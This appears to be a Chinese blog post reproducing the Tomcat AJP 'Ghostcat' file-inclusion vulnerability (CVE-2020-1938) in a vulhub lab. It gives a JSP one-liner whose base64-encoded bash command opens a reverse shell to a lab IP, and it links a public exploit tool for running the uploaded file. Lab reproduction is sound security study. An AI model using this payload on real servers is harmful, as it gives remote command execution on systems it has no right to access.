vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)

余生有个小酒馆2024-03-02 13:21

查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。

利用如下工具均可测试漏洞:

工具需要用到python2,

如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件

复制代码 
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>

利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487

进行执行上传的恶意文件

相关推荐
okiseethenwhat7 分钟前
Java 进程 CPU 飙高排查全流程详解
java·开发语言
2601_949816688 分钟前
使用rustDesk搭建私有远程桌面
java
看见代码就想敲15 分钟前
java学习之(Maven pom.xml 详细讲解)
java·学习·maven
糖炒栗子032624 分钟前
图片加水印与 EXIF 保留方案
java
tongxh42324 分钟前
Spring Boot问题总结
java·spring boot·后端
Chan1630 分钟前
SpringAI:RAG 最佳实践与调优
java·spring boot·ai·java-ee·intellij-idea·rag·springai
odng31 分钟前
Windsurf / Codex 默认只显示 3 个最近任务,如何改成 100 个
java
m0_7167652332 分钟前
C++巩固案例--通讯录管理系统详解
java·开发语言·c++·经验分享·学习·青少年编程·visual studio
Predestination王瀞潞33 分钟前
Java EE3-我独自整合(第三章:Spring DI 入门案例)
java·spring·java-ee
Ttang2336 分钟前
Java爬虫:Jsoup+OkHttp实战指南
java·爬虫·okhttp
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南06UV安装并设置国内源07围棋-html版本08“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)09AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南10纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!